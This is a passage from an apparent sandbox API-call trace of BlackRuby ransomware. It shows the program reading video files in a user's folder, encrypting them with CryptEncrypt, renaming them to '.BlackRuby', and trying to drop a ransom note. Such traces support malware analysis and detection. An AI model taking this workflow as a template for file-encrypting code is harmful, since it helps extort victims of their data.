[0062.011] GetLastError () returned 0x0 [0062.011] CryptEncrypt (in: hKey=0x360f20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c00540*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1c00540*, pdwDataLen=0x18ed94*=0x10) returned 1 [0062.011] GetLastError () returned 0x0 [0062.013] CryptDestroyKey (hKey=0x360de0) returned 1 [0062.013] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0062.013] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0062.013] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\9Ly87_7LnHhHoNCijdQI.avi", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\9Ly87_7LnHhHoNCijdQI.avi", lpFilePart=0x0) returned 0x30 [0062.013] GetLastError () returned 0x0 [0062.013] SetErrorMode (uMode=0x1) returned 0x0 [0062.013] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\9Ly87_7LnHhHoNCijdQI.avi" (normalized: "c:\\users\\eebsym5\\videos\\9ly87_7lnhhhoncijdqi.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0062.014] GetLastError () returned 0xb7 [0062.014] GetFileType (hFile=0x258) returned 0x1 [0062.014] SetErrorMode (uMode=0x0) returned 0x1 [0062.014] GetFileType (hFile=0x258) returned 0x1 [0062.016] CloseHandle (hObject=0x258) returned 1 [0062.016] GetLastError () returned 0xb7 [0062.016] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\9Ly87_7LnHhHoNCijdQI.avi", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\9Ly87_7LnHhHoNCijdQI.avi", lpFilePart=0x0) returned 0x30 [0062.016] GetLastError () returned 0xb7 [0062.016] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\Encrypted_PyrH2utQEAWKQRPJYREf5hoSkKcHO0xyHdquU.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\Encrypted_PyrH2utQEAWKQRPJYREf5hoSkKcHO0xyHdquU.BlackRuby", lpFilePart=0x0) returned 0x51 [0062.016] GetLastError () returned 0xb7 [0062.016] SetErrorMode (uMode=0x1) returned 0x0 [0062.016] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\9Ly87_7LnHhHoNCijdQI.avi" (normalized: "c:\\users\\eebsym5\\videos\\9ly87_7lnhhhoncijdqi.avi"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x468e5780, ftCreationTime.dwHighDateTime=0x1d34ee4, ftLastAccessTime.dwLowDateTime=0xcd2f6790, ftLastAccessTime.dwHighDateTime=0x1d355f9, ftLastWriteTime.dwLowDateTime=0x2d292b00, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x17480)) returned 1 [0062.016] GetLastError () returned 0xb7 [0062.016] SetErrorMode (uMode=0x0) returned 0x1 [0062.016] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Videos\\9Ly87_7LnHhHoNCijdQI.avi" (normalized: "c:\\users\\eebsym5\\videos\\9ly87_7lnhhhoncijdqi.avi"), lpNewFileName="C:\\Users\\EEBsYm5\\Videos\\Encrypted_PyrH2utQEAWKQRPJYREf5hoSkKcHO0xyHdquU.BlackRuby" (normalized: "c:\\users\\eebsym5\\videos\\encrypted_pyrh2utqeawkqrpjyref5hoskkcho0xyhdquu.blackruby")) returned 1 [0062.017] GetLastError () returned 0xb7 [0062.017] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x30 [0062.017] GetLastError () returned 0xb7 [0062.017] SetErrorMode (uMode=0x1) returned 0x0 [0062.017] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\videos\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0062.017] GetLastError () returned 0x5 [0062.018] SetErrorMode (uMode=0x0) returned 0x1 [0062.018] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\desktop.ini", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\desktop.ini", lpFilePart=0x0) returned 0x23 [0062.018] GetLastError () returned 0x5 [0062.018] SetErrorMode (uMode=0x1) returned 0x0 [0062.018] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\desktop.ini" (normalized: "c:\\users\\eebsym5\\videos\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x1c1d650 | out: lpFileInformation=0x1c1d650*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8e98a30, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8e98a30, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xec3e8400, ftLastWriteTime.dwHighDateTime=0x1d2f581, nFileSizeHigh=0x0, nFileSizeLow=0x1f8)) returned 1 [0062.019] GetLastError () returned 0x5 [0062.019] SetErrorMode (uMode=0x0) returned 0x1 [0062.019] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x30 [0062.019] GetLastError () returned 0x5 [0062.019] SetErrorMode (uMode=0x1) returned 0x0 [0062.019] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\videos\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0062.019] GetLastError () returned 0x5 [0062.020] SetErrorMode (uMode=0x0) returned 0x1 [0062.020] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\j7E_nWqtRCLlXz3.avi", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\j7E_nWqtRCLlXz3.avi", lpFilePart=0x0) returned 0x2b [0062.020] GetLastError () returned 0x5 [0062.020] SetErrorMode (uMode=0x1) returned 0x0 [0062.020] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\j7E_nWqtRCLlXz3.avi" (normalized: "c:\\users\\eebsym5\\videos\\j7e_nwqtrcllxz3.avi"), fInfoLevelId=0x0, lpFileInformation=0x1c3b35c | out: lpFileInformation=0x1c3b35c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdbe830b0, ftCreationTime.dwHighDateTime=0x1d34e00, ftLastAccessTime.dwLowDateTime=0x5d450d80, ftLastAccessTime.dwHighDateTime=0x1d34d08, ftLastWriteTime.dwLowDateTime=0x5d450d80, ftLastWriteTime.dwHighDateTime=0x1d34d08, nFileSizeHigh=0x0, nFileSizeLow=0x183a)) returned 1 [0062.020] GetLastError () returned 0x5 [0062.020] SetErrorMode (uMode=0x0) returned 0x1 [0062.020] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\j7E_nWqtRCLlXz3.avi", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\j7E_nWqtRCLlXz3.avi", lpFilePart=0x0) returned 0x2b [0062.020] GetLastError () returned 0x5 [0062.020] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\j7E_nWqtRCLlXz3.avi", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\j7E_nWqtRCLlXz3.avi", lpFilePart=0x0) returned 0x2b [0062.021] GetLastError () returned 0x5 [0062.021] SetErrorMode (uMode=0x1) returned 0x0 [0062.021] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\j7E_nWqtRCLlXz3.avi" (normalized: "c:\\users\\eebsym5\\videos\\j7e_nwqtrcllxz3.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0062.021] GetLastError () returned 0x0 [0062.021] GetFileType (hFile=0x258) returned 0x1 [0062.021] SetErrorMode (uMode=0x0) returned 0x1 [0062.021] GetFileType (hFile=0x258) returned 0x1 [0062.021] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x183a [0062.021] GetLastError () returned 0x0 [0062.021] ReadFile (in: hFile=0x258, lpBuffer=0x1c3d1d4, nNumberOfBytesToRead=0x183a, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1c3d1d4*, lpNumberOfBytesRead=0x18ed84*=0x183a, lpOverlapped=0x0) returned 1 [0062.022] GetLastError () returned 0x0 [0062.022] CloseHandle (hObject=0x258) returned 1 [0062.022] GetLastError () returned 0x0 [0062.022] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\j7E_nWqtRCLlXz3.avi", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\j7E_nWqtRCLlXz3.avi", lpFilePart=0x0) returned 0x2b [0062.022] GetLastError () returned 0x0 [0062.022] SetErrorMode (uMode=0x1) returned 0x0 [0062.022] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\j7E_nWqtRCLlXz3.avi" (normalized: "c:\\users\\eebsym5\\videos\\j7e_nwqtrcllxz3.avi"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdbe830b0, ftCreationTime.dwHighDateTime=0x1d34e00, ftLastAccessTime.dwLowDateTime=0x5d450d80, ftLastAccessTime.dwHighDateTime=0x1d34d08, ftLastWriteTime.dwLowDateTime=0x5d450d80, ftLastWriteTime.dwHighDateTime=0x1d34d08, nFileSizeHigh=0x0, nFileSizeLow=0x183a)) returned 1 [0062.022] GetLastError () returned 0x0 [0062.022] SetErrorMode (uMode=0x0) returned 0x1 [0062.032] CryptImportKey (in: hProv=0x37c680, pbData=0x1c9a604, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360b20) returned 1 [0062.032] GetLastError () returned 0x0 [0062.032] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.032] GetLastError () returned 0x0 [0062.037] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.037] GetLastError () returned 0x0 [0062.037] CryptDuplicateKey (in: hKey=0x360b20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360d20) returned 1 [0062.037] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.037] GetLastError () returned 0x0 [0062.037] CryptSetKeyParam (hKey=0x360d20, dwParam=0x4, pbData=0x1cc7650*=0x1, dwFlags=0x0) returned 1 [0062.037] GetLastError () returned 0x0 [0062.037] CryptSetKeyParam (hKey=0x360d20, dwParam=0x1, pbData=0x1cc761c, dwFlags=0x0) returned 1 [0062.037] GetLastError () returned 0x0 [0062.037] CryptEncrypt (in: hKey=0x360d20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cc7698*, pdwDataLen=0x18ed74*=0x1930, dwBufLen=0x1930 | out: pbData=0x1cc7698*, pdwDataLen=0x18ed74*=0x1930) returned 1 [0062.037] GetLastError () returned 0x0 [0062.038] CryptEncrypt (in: hKey=0x360d20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cca924*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1cca924*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0062.038] GetLastError () returned 0x0 [0062.038] CryptEncrypt (in: hKey=0x360d20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1cca954*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1cca954*, pdwDataLen=0x18ed94*=0x10) returned 1 [0062.038] GetLastError () returned 0x0 [0062.038] CryptDestroyKey (hKey=0x360b20) returned 1 [0062.038] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0062.038] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0062.038] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\j7E_nWqtRCLlXz3.avi", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\j7E_nWqtRCLlXz3.avi", lpFilePart=0x0) returned 0x2b [0062.038] GetLastError () returned 0x0 [0062.038] SetErrorMode (uMode=0x1) returned 0x0 [0062.039] GetFileType (hFile=0x258) returned 0x1 [0062.039] GetFileType (hFile=0x258) returned 0x1 [0062.039] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Videos\\j7E_nWqtRCLlXz3.avi" (normalized: "c:\\users\\eebsym5\\videos\\j7e_nwqtrcllxz3.avi"), lpNewFileName="C:\\Users\\EEBsYm5\\Videos\\Encrypted_CptU6xTFZnDesLl5giQubdE5yjjGFVLrS4sqWHb3egp2.BlackRuby" (normalized: "c:\\users\\eebsym5\\videos\\encrypted_cptu6xtfzndesll5giqubde5yjjgfvlrs4sqwhb3egp2.blackruby")) returned 1 [0062.040] GetLastError () returned 0xb7 [0062.041] SetErrorMode (uMode=0x0) returned 0x1 [0062.041] GetFileType (hFile=0x258) returned 0x1 [0062.041] GetFileType (hFile=0x258) returned 0x1 [0062.041] ReadFile (in: hFile=0x258, lpBuffer=0x1cee108, nNumberOfBytesToRead=0x124fe, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1cee108*, lpNumberOfBytesRead=0x18ed84*=0x124fe, lpOverlapped=0x0) returned 1 [0062.042] GetLastError () returned 0x0 [0062.080] CryptImportKey (in: hProv=0x37c708, pbData=0x1b7ff54, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360de0) returned 1 [0062.080] GetLastError () returned 0x0 [0062.080] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.080] GetLastError () returned 0x0 [0062.085] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.085] GetLastError () returned 0x0 [0062.085] CryptDuplicateKey (in: hKey=0x360de0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360ae0) returned 1 [0062.085] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.085] GetLastError () returned 0x0 [0062.085] CryptSetKeyParam (hKey=0x360ae0, dwParam=0x4, pbData=0x1bacfa0*=0x1, dwFlags=0x0) returned 1 [0062.085] GetLastError () returned 0x0 [0062.085] CryptSetKeyParam (hKey=0x360ae0, dwParam=0x1, pbData=0x1bacf6c, dwFlags=0x0) returned 1 [0062.085] GetLastError () returned 0x0 [0062.085] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bacfe8*, pdwDataLen=0x18ed74*=0x125f0, dwBufLen=0x125f0 | out: pbData=0x1bacfe8*, pdwDataLen=0x18ed74*=0x125f0) returned 1 [0062.085] GetLastError () returned 0x0 [0062.085] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bd1bf4*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1bd1bf4*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0062.085] GetLastError () returned 0x0 [0062.085] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1bd1c24*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1bd1c24*, pdwDataLen=0x18ed94*=0x10) returned 1 [0062.085] GetLastError () returned 0x0 [0062.086] CryptDestroyKey (hKey=0x360de0) returned 1 [0062.086] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0062.086] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0062.086] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\vvz ld9wCNiG_GAVyE0O.mkv", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\vvz ld9wCNiG_GAVyE0O.mkv", lpFilePart=0x0) returned 0x30 [0062.086] GetLastError () returned 0x0 [0062.086] SetErrorMode (uMode=0x1) returned 0x0 [0062.087] GetFileType (hFile=0x258) returned 0x1 [0062.087] SetErrorMode (uMode=0x0) returned 0x1 [0062.087] GetFileType (hFile=0x258) returned 0x1 [0062.089] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\vvz ld9wCNiG_GAVyE0O.mkv", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\vvz ld9wCNiG_GAVyE0O.mkv", lpFilePart=0x0) returned 0x30 [0062.089] GetLastError () returned 0xb7 [0062.089] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\Encrypted_t2Ii59VESaheCXknc0c3WLpdGUeg9PYIqdZ6.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\Encrypted_t2Ii59VESaheCXknc0c3WLpdGUeg9PYIqdZ6.BlackRuby", lpFilePart=0x0) returned 0x50 [0062.089] GetLastError () returned 0xb7 [0062.089] SetErrorMode (uMode=0x1) returned 0x0 [0062.089] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\vvz ld9wCNiG_GAVyE0O.mkv" (normalized: "c:\\users\\eebsym5\\videos\\vvz ld9wcnig_gavye0o.mkv"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefa73500, ftCreationTime.dwHighDateTime=0x1d356ad, ftLastAccessTime.dwLowDateTime=0x7b812f00, ftLastAccessTime.dwHighDateTime=0x1d3582e, ftLastWriteTime.dwLowDateTime=0x2d32b080, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x12600)) returned 1 [0062.089] GetLastError () returned 0xb7 [0062.089] SetErrorMode (uMode=0x0) returned 0x1 [0062.089] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Videos\\vvz ld9wCNiG_GAVyE0O.mkv" (normalized: "c:\\users\\eebsym5\\videos\\vvz ld9wcnig_gavye0o.mkv"), lpNewFileName="C:\\Users\\EEBsYm5\\Videos\\Encrypted_t2Ii59VESaheCXknc0c3WLpdGUeg9PYIqdZ6.BlackRuby" (normalized: "c:\\users\\eebsym5\\videos\\encrypted_t2ii59vesahecxknc0c3wlpdgueg9pyiqdz6.blackruby")) returned 1 [0062.090] GetLastError () returned 0xb7 [0062.090] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x30 [0062.090] GetLastError () returned 0xb7 [0062.090] SetErrorMode (uMode=0x1) returned 0x0 [0062.091] SetErrorMode (uMode=0x0) returned 0x1 [0062.091] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\wv6365Y8VL_2D.flv", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\wv6365Y8VL_2D.flv", lpFilePart=0x0) returned 0x29 [0062.091] GetLastError () returned 0x5 [0062.091] SetErrorMode (uMode=0x1) returned 0x0 [0062.092] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\wv6365Y8VL_2D.flv" (normalized: "c:\\users\\eebsym5\\videos\\wv6365y8vl_2d.flv"), fInfoLevelId=0x0, lpFileInformation=0x1c01340 | out: lpFileInformation=0x1c01340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfed488d0, ftCreationTime.dwHighDateTime=0x1d34af9, ftLastAccessTime.dwLowDateTime=0x15d355e0, ftLastAccessTime.dwHighDateTime=0x1d34db4, ftLastWriteTime.dwLowDateTime=0x15d355e0, ftLastWriteTime.dwHighDateTime=0x1d34db4, nFileSizeHigh=0x0, nFileSizeLow=0x141ce)) returned 1 [0062.092] GetLastError () returned 0x5 [0062.092] SetErrorMode (uMode=0x0) returned 0x1 [0062.092] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\wv6365Y8VL_2D.flv", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\wv6365Y8VL_2D.flv", lpFilePart=0x0) returned 0x29 [0062.092] GetLastError () returned 0x5 [0062.092] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\wv6365Y8VL_2D.flv", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\wv6365Y8VL_2D.flv", lpFilePart=0x0) returned 0x29 [0062.092] GetLastError () returned 0x5 [0062.092] SetErrorMode (uMode=0x1) returned 0x0 [0062.092] GetFileType (hFile=0x258) returned 0x1 [0062.092] SetErrorMode (uMode=0x0) returned 0x1 [0062.092] GetFileType (hFile=0x258) returned 0x1 [0062.092] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x141ce [0062.092] GetLastError () returned 0x0 [0062.092] ReadFile (in: hFile=0x258, lpBuffer=0x1c031c0, nNumberOfBytesToRead=0x141ce, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1c031c0*, lpNumberOfBytesRead=0x18ed84*=0x141ce, lpOverlapped=0x0) returned 1 [0062.093] GetLastError () returned 0x0 [0062.093] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\wv6365Y8VL_2D.flv", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\wv6365Y8VL_2D.flv", lpFilePart=0x0) returned 0x29 [0062.093] GetLastError () returned 0x0 [0062.093] SetErrorMode (uMode=0x1) returned 0x0 [0062.093] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\wv6365Y8VL_2D.flv" (normalized: "c:\\users\\eebsym5\\videos\\wv6365y8vl_2d.flv"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfed488d0, ftCreationTime.dwHighDateTime=0x1d34af9, ftLastAccessTime.dwLowDateTime=0x15d355e0, ftLastAccessTime.dwHighDateTime=0x1d34db4, ftLastWriteTime.dwLowDateTime=0x15d355e0, ftLastWriteTime.dwHighDateTime=0x1d34db4, nFileSizeHigh=0x0, nFileSizeLow=0x141ce)) returned 1 [0062.093] GetLastError () returned 0x0 [0062.093] SetErrorMode (uMode=0x0) returned 0x1 [0062.104] CryptImportKey (in: hProv=0x37c680, pbData=0x1c85910, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360e60) returned 1 [0062.104] GetLastError () returned 0x0 [0062.104] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.104] GetLastError () returned 0x0 [0062.109] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.109] GetLastError () returned 0x0 [0062.109] CryptDuplicateKey (in: hKey=0x360e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360c20) returned 1 [0062.109] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.109] GetLastError () returned 0x0 [0062.109] CryptSetKeyParam (hKey=0x360c20, dwParam=0x4, pbData=0x1cb295c*=0x1, dwFlags=0x0) returned 1 [0062.109] GetLastError () returned 0x0 [0062.109] CryptSetKeyParam (hKey=0x360c20, dwParam=0x1, pbData=0x1cb2928, dwFlags=0x0) returned 1 [0062.109] GetLastError () returned 0x0 [0062.109] CryptEncrypt (in: hKey=0x360c20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cb29a4*, pdwDataLen=0x18ed74*=0x142c0, dwBufLen=0x142c0 | out: pbData=0x1cb29a4*, pdwDataLen=0x18ed74*=0x142c0) returned 1 [0062.110] GetLastError () returned 0x0 [0062.110] CryptEncrypt (in: hKey=0x360c20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cdaf50*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1cdaf50*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0062.110] GetLastError () returned 0x0 [0062.110] CryptEncrypt (in: hKey=0x360c20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1cdaf80*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1cdaf80*, pdwDataLen=0x18ed94*=0x10) returned 1 [0062.110] GetLastError () returned 0x0 [0062.111] CryptDestroyKey (hKey=0x360e60) returned 1 [0062.111] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0062.111] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0062.111] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\wv6365Y8VL_2D.flv", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\wv6365Y8VL_2D.flv", lpFilePart=0x0) returned 0x29 [0062.111] GetLastError () returned 0x0 [0062.111] SetErrorMode (uMode=0x1) returned 0x0 [0062.112] GetFileType (hFile=0x258) returned 0x1 [0062.112] GetFileType (hFile=0x258) returned 0x1 [0062.114] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Videos\\wv6365Y8VL_2D.flv" (normalized: "c:\\users\\eebsym5\\videos\\wv6365y8vl_2d.flv"), lpNewFileName="C:\\Users\\EEBsYm5\\Videos\\Encrypted_6MXiFubtKG7GSwTr4pdHkpUi0n5n4JtEPIGRgetvK.BlackRuby" (normalized: "c:\\users\\eebsym5\\videos\\encrypted_6mxifubtkg7gswtr4pdhkpui0n5n4jtepigrgetvk.blackruby")) returned 1 [0062.114] GetLastError () returned 0xb7 [0062.115] SetErrorMode (uMode=0x0) returned 0x1 [0062.115] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360e60 [0062.116] GetLastError () returned 0x5 [0062.116] FindNextFileW (in: hFindFile=0x360e60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0062.116] GetLastError () returned 0x5 [0062.116] FindNextFileW (in: hFindFile=0x360e60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0062.116] GetLastError () returned 0x5 [0062.116] FindNextFileW (in: hFindFile=0x360e60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0062.116] GetLastError () returned 0x5 [0062.116] FindNextFileW (in: hFindFile=0x360e60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0062.116] GetLastError () returned 0x5 [0062.116] FindNextFileW (in: hFindFile=0x360e60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0062.116] GetLastError () returned 0x5 [0062.116] FindNextFileW (in: 